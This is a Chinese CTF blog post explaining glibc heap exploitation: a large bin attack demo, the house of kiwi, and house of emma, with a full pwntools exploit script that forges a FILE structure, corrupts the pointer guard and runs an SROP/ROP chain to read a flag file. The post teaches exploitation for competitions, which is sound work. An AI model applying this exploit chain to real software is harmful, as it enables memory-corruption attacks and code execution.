



<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#FFF">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon.png">

<link rel="icon" type="image/ico" sizes="32x32" href="/images/favicon.ico">
  <meta http-equiv="Cache-Control" content="no-transform">
  <meta http-equiv="Cache-Control" content="no-siteapp">


<link rel="alternate" type="application/rss+xml" title="Hexo" href="http://wscyoulin.github.io/rss.xml" />
<link rel="alternate" type="application/atom+xml" title="Hexo" href="http://wscyoulin.github.io/atom.xml" />
<link rel="alternate" type="application/json" title="Hexo" href="http://wscyoulin.github.io/feed.json" />

<link rel="stylesheet" href="//fonts.googleapis.com/css?family=Mulish:300,300italic,400,400italic,700,700italic%7CFredericka%20the%20Great:300,300italic,400,400italic,700,700italic%7CNoto%20Serif%20JP:300,300italic,400,400italic,700,700italic%7CNoto%20Serif%20SC:300,300italic,400,400italic,700,700italic%7CInconsolata:300,300italic,400,400italic,700,700italic&display=swap&subset=latin,latin-ext">

<link rel="stylesheet" href="/css/app.css?v=0.2.5">

  

<link rel="canonical" href="http://wscyoulin.github.io/2022/10/11/house-of-emma/">



  <title>
house_of_emma |
youlin = Hexo</title>
<meta name="generator" content="Hexo 6.0.0"></head>
<body itemscope itemtype="http://schema.org/WebPage">
  <div id="loading">
    <div class="cat">
      <div class="body"></div>
      <div class="head">
        <div class="face"></div>
      </div>
      <div class="foot">
        <div class="tummy-end"></div>
        <div class="bottom"></div>
        <div class="legs left"></div>
        <div class="legs right"></div>
      </div>
      <div class="paw">
        <div class="hands left"></div>
        <div class="hands right"></div>
      </div>
    </div>
  </div>
  <div id="container">
    <header id="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="inner">
        <div id="brand">
          <div class="pjax">
          
  <h1 itemprop="name headline">house_of_emma
  </h1>
  
<div class="meta">
  <span class="item" title="Created: 2022-10-11 20:17:39">
    <span class="icon">
      <i class="ic i-calendar"></i>
    </span>
    <span class="text">Posted on</span>
    <time itemprop="dateCreated datePublished" datetime="2022-10-11T20:17:39+08:00">2022-10-11</time>
  </span>
</div>


          </div>
        </div>
        <nav id="nav">
  <div class="inner">
    <div class="toggle">
      <div class="lines" aria-label="Toggle navigation bar">
        <span class="line"></span>
        <span class="line"></span>
        <span class="line"></span>
      </div>
    </div>
    <ul class="menu">
      <li class="item title"><a href="/" rel="start">youlin</a></li>
    </ul>
    <ul class="right">
      <li class="item theme">
        <i class="ic i-sun"></i>
      </li>
      <li class="item search">
        <i class="ic i-search"></i>
      </li>
    </ul>
  </div>
</nav>

      </div>
      <div id="imgs" class="pjax">
        <ul>
          <li class="item" data-background-image="https://tva3.sinaimg.cn/large/6833939bly1giclh3brzpj20zk0m8ann.jpg"></li>
          <li class="item" data-background-image="https://tva3.sinaimg.cn/large/6833939bly1gicli3sbvtj20zk0m8x6p.jpg"></li>
          <li class="item" data-background-image="https://tva3.sinaimg.cn/large/6833939bly1gipetfk5zwj20zk0m8e81.jpg"></li>
          <li class="item" data-background-image="https://tva3.sinaimg.cn/large/6833939bly1giclwrdwyaj20zk0m8are.jpg"></li>
          <li class="item" data-background-image="https://tva3.sinaimg.cn/large/6833939bly1gipeudstjqj20zk0m8k3r.jpg"></li>
          <li class="item" data-background-image="https://tva3.sinaimg.cn/large/6833939bly1gicljgocqbj20zk0m8e81.jpg"></li>
        </ul>
      </div>
    </header>
    <div id="waves">
      <svg class="waves" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" viewBox="0 24 150 28" preserveAspectRatio="none" shape-rendering="auto">
        <defs>
          <path id="gentle-wave" d="M-160 44c30 0 58-18 88-18s 58 18 88 18 58-18 88-18 58 18 88 18 v44h-352z" />
        </defs>
        <g class="parallax">
          <use xlink:href="#gentle-wave" x="48" y="0" />
          <use xlink:href="#gentle-wave" x="48" y="3" />
          <use xlink:href="#gentle-wave" x="48" y="5" />
          <use xlink:href="#gentle-wave" x="48" y="7" />
        </g>
      </svg>
    </div>
    <main>
      <div class="inner">
        <div id="main" class="pjax">
          
  <div class="article wrap">
    
<div class="breadcrumb" itemscope itemtype="https://schema.org/BreadcrumbList">
<i class="ic i-home"></i>
<span><a href="/">Home</a></span>
</div>

    <article itemscope itemtype="http://schema.org/Article" class="post block" lang="en">
  <link itemprop="mainEntityOfPage" href="http://wscyoulin.github.io/2022/10/11/house-of-emma/">

  <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
    <meta itemprop="image" content="/images/avatar.jpg">
    <meta itemprop="name" content="John Doe">
    <meta itemprop="description" content=", ">
  </span>

  <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
    <meta itemprop="name" content="Hexo">
  </span>

  <div class="body md" itemprop="articleBody">
    

    <h1 id="前置知识"><a href="#前置知识" class="headerlink" title="前置知识"></a>前置知识</h1><h2 id="large-bin-attack"><a href="#large-bin-attack" class="headerlink" title="large bin attack"></a>large bin attack</h2><p>Ayakaaaa师傅的一个demo:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line">#include&lt;stdlib.h&gt;</span><br><span class="line">#include&lt;stdio.h&gt;</span><br><span class="line">#include&lt;assert.h&gt;</span><br><span class="line">int main()&#123;</span><br><span class="line">  size_t target = 0;</span><br><span class="line">  size_t *p1 = malloc(0x428);</span><br><span class="line">  size_t *g1 = malloc(0x18);</span><br><span class="line">  size_t *p2 = malloc(0x418);</span><br><span class="line">  size_t *g2 = malloc(0x18);</span><br><span class="line">  free(p1);</span><br><span class="line">  size_t *g3 = malloc(0x438);</span><br><span class="line">  free(p2);</span><br><span class="line">  p1[3] = (size_t)((&amp;target)-4);</span><br><span class="line">  size_t *g4 = malloc(0x438);</span><br><span class="line">  assert((size_t)(p2-2) == target);</span><br><span class="line">  return 0;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>首先申请4个heap</p>
<p><img data-src="https://tuchuangs.com/imgs/2022/10/11/4c50601a1cf06d9e.png"></p>
<p>然后将大一些的chunkp1释放掉，再申请一个更大的chunk,将p1放进largebin中：</p>
<p><img data-src="https://tuchuangs.com/imgs/2022/10/11/89098bff8dc8b569.png"></p>
<p>然后释放掉p2，再修改p1的bk_nextsize为&amp;target-0x20</p>
<p><img data-src="https://tuchuangs.com/imgs/2022/10/11/891cef9b0140c8b0.png"></p>
<p>可以看到，p2进入了unsortedbin，p1的bk_nextsize被我们成功修改，接下来再申请一个大的chunk的时候，就会将p2放进largebin中，也就是在这个插入的过程中触发了我们的攻击流程。</p>
<p>最后就是target会被写入p1的地址，p2进入largebin,达到一个任意地址写入一个堆地址的效果</p>
<h2 id="house-of-kiwi"><a href="#house-of-kiwi" class="headerlink" title="house of kiwi"></a>house of kiwi</h2><p>当程序没有显示调用exit，也不会通过主函数返回，那么以往我们使用的FSOP就无法进行了，如果此时两个hook也没法利用，我们需要一种能够稳定触发IO中函数的路径，这就是house of kiwi,它利用了__malloc_assert</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">static void</span><br><span class="line">__malloc_assert (const char *assertion, const char *file, unsigned int line,</span><br><span class="line">       const char *function)</span><br><span class="line">&#123;</span><br><span class="line">(void) __fxprintf (NULL, &quot;%s%s%s:%u: %s%sAssertion `%s&#x27; failed.\n&quot;,</span><br><span class="line">           __progname, __progname[0] ? &quot;: &quot; : &quot;&quot;,</span><br><span class="line">           file, line,</span><br><span class="line">           function ? function : &quot;&quot;, function ? &quot;: &quot; : &quot;&quot;,</span><br><span class="line">           assertion);</span><br><span class="line">fflush (stderr);</span><br><span class="line">abort ();</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>从源码中可以看到这个断言中调用了fflush(stderr)，这个函数会稳定的调用_IO_file_jumps中的sync<br>在house of kiwi 中，如果我们能实现一个任意地址写，那么就可以修改sync指针，并且在调用的时候还发现，rdx也很稳定的是IO_helper_jumps，此时如果我们通过任意地址写将sync指针改成setcontext+0x61，且将IO_helper_jumps+0xa0和IO_helper_jumps+0xa8改写，就可以实现栈迁移orw。</p>
<h1 id="house-of-emma"><a href="#house-of-emma" class="headerlink" title="house of emma"></a>house of emma</h1><p>house of kiwi之所以被称为house of emma的前置知识，是因为他提供了一条调用链，house of kiwi所找到的是在assert的时候会稳定的去调用_IO_file_jumps中的sync，后续需要通过任意地址写修改sync以及其他东西，而house of emma是直接将虚表的偏移修改，修改之后，本来应该调用_IO_file_jumps中的sync，变成了调用wjh发现的几个危险的函数，这几个危险函数可以仅仅通过精心布置fake FILE实现srop，并不需要任意地址写任意内容，只需要能够做到任意地址写已知的堆地址即可，这样的条件是非常低的，largebin attack就可以做到。<br><strong>大致流程：</strong></p>
<p>1.修改stderr的指针为已知堆地址<br> 2.修改TLS上的guard为已知值<br> 3.构造fake FILE<br> 4.触发house of kiwi（可以通过unsortedbin 与 top chunk合并来触发）<br> 5.执行srop和orw</p>
<p>除了上面介绍的那个函数，还有几个函数也存在类似的调用过程：<br> _IO_cookie_write<br> _IO_cookie_seek<br> _IO_cookie_close<br> 偏移略有不同，不过打法一模一样</p>
<p>wjh师傅的exp:(可以当作模板用)</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br><span class="line">119</span><br><span class="line">120</span><br><span class="line">121</span><br><span class="line">122</span><br><span class="line">123</span><br><span class="line">124</span><br><span class="line">125</span><br><span class="line">126</span><br><span class="line">127</span><br><span class="line">128</span><br><span class="line">129</span><br><span class="line">130</span><br><span class="line">131</span><br><span class="line">132</span><br><span class="line">133</span><br><span class="line">134</span><br><span class="line">135</span><br><span class="line">136</span><br><span class="line">137</span><br><span class="line">138</span><br><span class="line">139</span><br><span class="line">140</span><br><span class="line">141</span><br><span class="line">142</span><br><span class="line">143</span><br><span class="line">144</span><br><span class="line">145</span><br><span class="line">146</span><br><span class="line">147</span><br><span class="line">148</span><br><span class="line">149</span><br><span class="line">150</span><br><span class="line">151</span><br><span class="line">152</span><br><span class="line">153</span><br><span class="line">154</span><br><span class="line">155</span><br><span class="line">156</span><br><span class="line">157</span><br><span class="line">158</span><br><span class="line">159</span><br><span class="line">160</span><br><span class="line">161</span><br><span class="line">162</span><br><span class="line">163</span><br><span class="line">164</span><br><span class="line">165</span><br><span class="line">166</span><br><span class="line">167</span><br><span class="line">168</span><br><span class="line">169</span><br></pre></td><td class="code"><pre><span class="line">from pwn import *</span><br><span class="line"></span><br><span class="line">context.log_level = &quot;debug&quot;</span><br><span class="line">context.arch = &quot;amd64&quot;</span><br><span class="line"># sh = process(&#x27;./pwn&#x27;)</span><br><span class="line">sh = remote(&#x27;127.0.0.1&#x27;, 9999)</span><br><span class="line">libc = ELF(&#x27;./lib/libc.so.6&#x27;)</span><br><span class="line">all_payload = &quot;&quot;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">def ROL(content, key):</span><br><span class="line">    tmp = bin(content)[2:].rjust(64, &#x27;0&#x27;)</span><br><span class="line">    return int(tmp[key:] + tmp[:key], 2)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">def add(idx, size):</span><br><span class="line">    global all_payload</span><br><span class="line">    payload = p8(0x1)</span><br><span class="line">    payload += p8(idx)</span><br><span class="line">    payload += p16(size)</span><br><span class="line">    all_payload += payload</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">def show(idx):</span><br><span class="line">    global all_payload</span><br><span class="line">    payload = p8(0x3)</span><br><span class="line">    payload += p8(idx)</span><br><span class="line">    all_payload += payload</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">def delete(idx):</span><br><span class="line">    global all_payload</span><br><span class="line">    payload = p8(0x2)</span><br><span class="line">    payload += p8(idx)</span><br><span class="line">    all_payload += payload</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">def edit(idx, buf):</span><br><span class="line">    global all_payload</span><br><span class="line">    payload = p8(0x4)</span><br><span class="line">    payload += p8(idx)</span><br><span class="line">    payload += p16(len(buf))</span><br><span class="line">    payload += str(buf)</span><br><span class="line">    all_payload += payload</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">def run_opcode():</span><br><span class="line">    global all_payload</span><br><span class="line">    all_payload += p8(5)</span><br><span class="line">    sh.sendafter(&quot;Pls input the opcode&quot;, all_payload)</span><br><span class="line">    all_payload = &quot;&quot;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"># leak libc_base</span><br><span class="line">add(0, 0x410)</span><br><span class="line">add(1, 0x410)</span><br><span class="line">add(2, 0x420)</span><br><span class="line">add(3, 0x410)</span><br><span class="line">delete(2)</span><br><span class="line">add(4, 0x430)</span><br><span class="line">show(2)</span><br><span class="line">run_opcode()</span><br><span class="line"></span><br><span class="line">libc_base = u64(sh.recvuntil(&#x27;\x7f&#x27;)[-6:].ljust(8, &#x27;\x00&#x27;)) - 0x1f30b0  # main_arena + 1104</span><br><span class="line">log.success(&quot;libc_base:\t&quot; + hex(libc_base))</span><br><span class="line">libc.address = libc_base</span><br><span class="line"></span><br><span class="line">guard = libc_base + 0x2035f0</span><br><span class="line">pop_rdi_addr = libc_base + 0x2daa2</span><br><span class="line">pop_rsi_addr = libc_base + 0x37c0a</span><br><span class="line">pop_rax_addr = libc_base + 0x446c0</span><br><span class="line">syscall_addr = libc_base + 0x883b6</span><br><span class="line">gadget_addr = libc_base + 0x146020  # mov rdx, qword ptr [rdi + 8]; mov qword ptr [rsp], rax; call qword ptr [rdx + 0x20];</span><br><span class="line">setcontext_addr = libc_base + 0x50bc0</span><br><span class="line"></span><br><span class="line"># leak heapbase</span><br><span class="line">edit(2, &quot;a&quot; * 0x10)</span><br><span class="line">show(2)</span><br><span class="line">run_opcode()</span><br><span class="line">sh.recvuntil(&quot;a&quot; * 0x10)</span><br><span class="line">heap_base = u64(sh.recv(6).ljust(8, &#x27;\x00&#x27;)) - 0x2ae0</span><br><span class="line">log.success(&quot;heap_base:\t&quot; + hex(heap_base))</span><br><span class="line"></span><br><span class="line"># largebin attack stderr</span><br><span class="line">delete(0)</span><br><span class="line">edit(2, p64(libc_base + 0x1f30b0) * 2 + p64(heap_base + 0x2ae0) + p64(libc.sym[&#x27;stderr&#x27;] - 0x20))</span><br><span class="line">add(5, 0x430)</span><br><span class="line">edit(2, p64(heap_base + 0x22a0) + p64(libc_base + 0x1f30b0) + p64(heap_base + 0x22a0) * 2)</span><br><span class="line">edit(0, p64(libc_base + 0x1f30b0) + p64(heap_base + 0x2ae0) * 3)</span><br><span class="line">add(0, 0x410)</span><br><span class="line">add(2, 0x420)</span><br><span class="line">run_opcode()</span><br><span class="line"></span><br><span class="line"># largebin attack guard</span><br><span class="line">delete(2)</span><br><span class="line">add(6, 0x430)</span><br><span class="line">delete(0)</span><br><span class="line">edit(2, p64(libc_base + 0x1f30b0) * 2 + p64(heap_base + 0x2ae0) + p64(guard - 0x20))</span><br><span class="line">add(7, 0x450)</span><br><span class="line">edit(2, p64(heap_base + 0x22a0) + p64(libc_base + 0x1f30b0) + p64(heap_base + 0x22a0) * 2)</span><br><span class="line">edit(0, p64(libc_base + 0x1f30b0) + p64(heap_base + 0x2ae0) * 3)</span><br><span class="line">add(2, 0x420)</span><br><span class="line">add(0, 0x410)</span><br><span class="line"></span><br><span class="line"># change top chunk size</span><br><span class="line">delete(7)</span><br><span class="line">add(8, 0x430)</span><br><span class="line">edit(7, &#x27;a&#x27; * 0x438 + p64(0x300))</span><br><span class="line">run_opcode()</span><br><span class="line"></span><br><span class="line">next_chain = 0</span><br><span class="line">srop_addr = heap_base + 0x2ae0 + 0x10</span><br><span class="line">fake_IO_FILE = 2 * p64(0)</span><br><span class="line">fake_IO_FILE += p64(0)  # _IO_write_base = 0</span><br><span class="line">fake_IO_FILE += p64(0xffffffffffffffff)  # _IO_write_ptr = 0xffffffffffffffff</span><br><span class="line">fake_IO_FILE += p64(0)</span><br><span class="line">fake_IO_FILE += p64(0)  # _IO_buf_base</span><br><span class="line">fake_IO_FILE += p64(0)  # _IO_buf_end</span><br><span class="line">fake_IO_FILE = fake_IO_FILE.ljust(0x58, &#x27;\x00&#x27;)</span><br><span class="line">fake_IO_FILE += p64(next_chain)  # _chain</span><br><span class="line">fake_IO_FILE = fake_IO_FILE.ljust(0x78, &#x27;\x00&#x27;)</span><br><span class="line">fake_IO_FILE += p64(heap_base)  # _lock = writable address</span><br><span class="line">fake_IO_FILE = fake_IO_FILE.ljust(0xB0, &#x27;\x00&#x27;)</span><br><span class="line">fake_IO_FILE += p64(0)  # _mode = 0</span><br><span class="line">fake_IO_FILE = fake_IO_FILE.ljust(0xC8, &#x27;\x00&#x27;)</span><br><span class="line">fake_IO_FILE += p64(libc.sym[&#x27;_IO_cookie_jumps&#x27;] + 0x40)  # vtable</span><br><span class="line">fake_IO_FILE += p64(srop_addr)  # rdi</span><br><span class="line">fake_IO_FILE += p64(0)</span><br><span class="line">fake_IO_FILE += p64(ROL(gadget_addr ^ (heap_base + 0x22a0), 0x11))</span><br><span class="line"></span><br><span class="line">fake_frame_addr = srop_addr</span><br><span class="line">frame = SigreturnFrame()</span><br><span class="line">frame.rdi = fake_frame_addr + 0xF8</span><br><span class="line">frame.rsi = 0</span><br><span class="line">frame.rdx = 0x100</span><br><span class="line">frame.rsp = fake_frame_addr + 0xF8 + 0x10</span><br><span class="line">frame.rip = pop_rdi_addr + 1  # : ret</span><br><span class="line"></span><br><span class="line">rop_data = [</span><br><span class="line">    pop_rax_addr,  # sys_open(&#x27;flag&#x27;, 0)</span><br><span class="line">    2,</span><br><span class="line">    syscall_addr,</span><br><span class="line"></span><br><span class="line">    pop_rax_addr,  # sys_read(flag_fd, heap, 0x100)</span><br><span class="line">    0,</span><br><span class="line">    pop_rdi_addr,</span><br><span class="line">    3,</span><br><span class="line">    pop_rsi_addr,</span><br><span class="line">    fake_frame_addr + 0x200,</span><br><span class="line">    syscall_addr,</span><br><span class="line"></span><br><span class="line">    pop_rax_addr,  # sys_write(1, heap, 0x100)</span><br><span class="line">    1,</span><br><span class="line">    pop_rdi_addr,</span><br><span class="line">    1,</span><br><span class="line">    pop_rsi_addr,</span><br><span class="line">    fake_frame_addr + 0x200,</span><br><span class="line">    syscall_addr</span><br><span class="line">]</span><br><span class="line">payload = p64(0) + p64(fake_frame_addr) + &#x27;\x00&#x27; * 0x10 + p64(setcontext_addr + 61)</span><br><span class="line">payload += str(frame).ljust(0xF8, &#x27;\x00&#x27;)[0x28:] + &#x27;flag&#x27;.ljust(0x10, &#x27;\x00&#x27;) + flat(rop_data)</span><br><span class="line"></span><br><span class="line">edit(0, fake_IO_FILE)</span><br><span class="line">edit(2, payload)</span><br><span class="line"></span><br><span class="line">add(8, 0x450)  # House OF Kiwi</span><br><span class="line"># gdb.attach(sh, &quot;b _IO_cookie_write&quot;)</span><br><span class="line">run_opcode()</span><br><span class="line">sh.interactive()</span><br></pre></td></tr></table></figure>


  </div>

   <footer>

    <div class="meta">
  <span class="item">
    <span class="icon">
      <i class="ic i-calendar-check"></i>
    </span>
    <span class="text">Edited on</span>
    <time title="Modified: 2022-10-11 20:38:43" itemprop="dateModified" datetime="2022-10-11T20:38:43+08:00">2022-10-11</time>
  </span>
</div>

      
<div class="reward">
  <button><i class="ic i-heartbeat"></i> Donate</button>
  <p>Give me a cup of [coffee]~(￣▽￣)~*</p>
  <div id="qr">
      
      <div>
        <img data-src="/images/wechatpay.png" alt="John Doe WeChat Pay">
        <p>WeChat Pay</p>
      </div>
      
      <div>
        <img data-src="/images/alipay.png" alt="John Doe Alipay">
        <p>Alipay</p>
      </div>
      
      <div>
        <img data-src="/images/paypal.png" alt="John Doe PayPal">
        <p>PayPal</p>
      </div>
  </div>
</div>

      

<div id="copyright">
<ul>
  <li class="author">
    <strong>Post author:  </strong>John Doe <i class="ic i-at"><em>@</em></i>Hexo
  </li>
  <li class="link">
    <strong>Post link: </strong>
    <a href="http://wscyoulin.github.io/2022/10/11/house-of-emma/" title="house_of_emma">http://wscyoulin.github.io/2022/10/11/house-of-emma/</a>
  </li>
  <li class="license">
    <strong>Copyright Notice:  </strong>All articles in this blog are licensed under <span class="exturl" data-url="aHR0cHM6Ly9jcmVhdGl2ZWNvbW1vbnMub3JnL2xpY2Vuc2VzL2J5LW5jLXNhLzQuMC9kZWVkLnpo"><i class="ic i-creative-commons"><em>(CC)</em></i>BY-NC-SA</span> unless stating additionally.
  </li>
</ul>
</div>

  </footer>

</article>

  </div>
  

<div class="post-nav">
    <div class="item left">
      

  <a href="/2022/10/02/%E5%A0%86%E5%88%A9%E7%94%A8%E6%80%BB%E7%BB%93/" itemprop="url" rel="prev" data-background-image="https:&#x2F;&#x2F;tva3.sinaimg.cn&#x2F;mw690&#x2F;6833939bly1gicli3sbvtj20zk0m8x6p.jpg" title="堆利用总结">
  <span class="type">Previous Post</span>
  <span class="category"><i class="ic i-flag"></i> </span>
  <h3>堆利用总结</h3>
  </a>

    </div>
    <div class="item right">
      

  <a href="/2022/10/14/buu-web%EF%BC%881-20%EF%BC%89/" itemprop="url" rel="next" data-background-image="https:&#x2F;&#x2F;tva3.sinaimg.cn&#x2F;mw690&#x2F;6833939bly1gipetfk5zwj20zk0m8e81.jpg" title="buu_web（1-20）">
  <span class="type">Next Post</span>
  <span class="category"><i class="ic i-flag"></i> </span>
  <h3>buu_web（1-20）</h3>
  </a>

    </div>
</div>

  
  <div class="wrap" id="comments"></div>


        </div>
        <div id="sidebar">
          

<div class="inner">

  <div class="panels">
    <div class="inner">
      <div class="contents panel pjax" data-title="Contents">
          <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#%E5%89%8D%E7%BD%AE%E7%9F%A5%E8%AF%86"><span class="toc-number">1.</span> <span class="toc-text">前置知识</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#large-bin-attack"><span class="toc-number">1.1.</span> <span class="toc-text">large bin attack</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#house-of-kiwi"><span class="toc-number">1.2.</span> <span class="toc-text">house of kiwi</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#house-of-emma"><span class="toc-number">2.</span> <span class="toc-text">house of emma</span></a></li></ol>
      </div>
      <div class="related panel pjax" data-title="Related">
      </div>
      <div class="overview panel" data-title="Overview">
        <div class="author" itemprop="author" itemscope itemtype="http://schema.org/Person">
  <img class="image" itemprop="image" alt="John Doe"
      data-src="/images/avatar.jpg">
  <p class="name" itemprop="name">John Doe</p>
  <div class="description" itemprop="description"></div>
</div>

<nav class="state">
    <div class="item posts">
      <a href="/archives/">
        <span class="count">24</span>
        <span class="name">posts</span>
      </a>
    </div>
    <div class="item categories">
      <a href="/categories/">
        <span class="count">1</span>
        <span class="name">categories</span>
      </a>
    </div>
</nav>

<div class="social">
</div>

<ul class="menu">
  
    
  <li class="item">
    <a href="/" rel="section"><i class="ic i-home"></i>Home</a>
  </li>


</ul>

      </div>
    </div>
  </div>

  <ul id="quick">
    <li class="prev pjax">
        <a href="/2022/10/02/%E5%A0%86%E5%88%A9%E7%94%A8%E6%80%BB%E7%BB%93/" rel="prev" title="Previous Post"><i class="ic i-chevron-left"></i></a>
    </li>
    <li class="up"><i class="ic i-arrow-up"></i></li>
    <li class="down"><i class="ic i-arrow-down"></i></li>
    <li class="next pjax">
        <a href="/2022/10/14/buu-web%EF%BC%881-20%EF%BC%89/" rel="next" title="Next Post"><i class="ic i-chevron-right"></i></a>
    </li>
    <li class="percent"></li>
  </ul>
</div>


        </div>
        <div class="dimmer"></div>
      </div>
    </main>
    <footer id="footer">
      <div class="inner">
        <div class="widgets">
          
<div class="rpost pjax">
  <h2>Random Posts</h2>
  <ul>
      
  <li class="item">
    
<div class="breadcrumb">
</div>

    <span><a href="/2022/10/16/docker/" title="docker">docker</a></span>
  </li>

      
  <li class="item">
    
<div class="breadcrumb">
</div>

    <span><a href="/2022/10/11/house-of-emma/" title="house_of_emma">house_of_emma</a></span>
  </li>

      
  <li class="item">
    
<div class="breadcrumb">
</div>

    <span><a href="/2022/11/25/sql%E6%B3%A8%E5%85%A5%E6%80%BB%E7%BB%93/" title="sql注入总结">sql注入总结</a></span>
  </li>

      
  <li class="item">
    
<div class="breadcrumb">
</div>

    <span><a href="/2022/09/04/awd_pwn%E6%80%BB%E7%BB%93/" title="awd_pwn总结">awd_pwn总结</a></span>
  </li>

      
  <li class="item">
    
<div class="breadcrumb">
</div>

    <span><a href="/2022/04/02/%E6%A0%BC%E5%BC%8F%E5%8C%96%E5%AD%97%E7%AC%A6%E4%B8%B2%E6%B3%84%E9%9C%B2canary/" title="格式化字符串泄露canary">格式化字符串泄露canary</a></span>
  </li>

      
  <li class="item">
    
<div class="breadcrumb">
</div>

    <span><a href="/2022/11/29/unlink%E5%A4%8D%E4%B9%A0/" title="unlink复习">unlink复习</a></span>
  </li>

      
  <li class="item">
    
<div class="breadcrumb">
<a href="/categories/cometition/" title="In cometition">cometition</a>
</div>

    <span><a href="/2022/09/20/DASCTF-X-CBCTF-2022%E4%B9%9D%E6%9C%88%E6%8C%91%E6%88%98%E8%B5%9B/" title="DASCTF_X_CBCTF_2022九月挑战赛">DASCTF_X_CBCTF_2022九月挑战赛</a></span>
  </li>

      
  <li class="item">
    
<div class="breadcrumb">
</div>

    <span><a href="/2022/08/04/0ctf-2017-babyheap/" title="0ctf_2017_babyheap">0ctf_2017_babyheap</a></span>
  </li>

      
  <li class="item">
    
<div class="breadcrumb">
</div>

    <span><a href="/2022/04/18/%E6%A0%88%E8%BF%81%E7%A7%BB/" title="栈迁移">栈迁移</a></span>
  </li>

      
  <li class="item">
    
<div class="breadcrumb">
</div>

    <span><a href="/2022/08/01/io-file/" title="io_file">io_file</a></span>
  </li>

  </ul>
</div>
<div>
  <h2>Recent Comments</h2>
  <ul class="leancloud-recent-comment"></ul>
</div>

        </div>
        <div class="status">
  <div class="copyright">
    
    &copy; 2010 – 
    <span itemprop="copyrightYear">2022</span>
    <span class="with-love">
      <i class="ic i-sakura rotate"></i>
    </span>
    <span class="author" itemprop="copyrightHolder">John Doe @ youlin</span>
  </div>
  <div class="powered-by">
    Powered by <span class="exturl" data-url="aHR0cHM6Ly9oZXhvLmlv">Hexo</span> & Theme.<span class="exturl" data-url="aHR0cHM6Ly9naXRodWIuY29tL2FtZWhpbWUvaGV4by10aGVtZS1zaG9rYQ==">Shoka</span>
  </div>
</div>

      </div>
    </footer>
  </div>
<script data-config type="text/javascript">
  var LOCAL = {
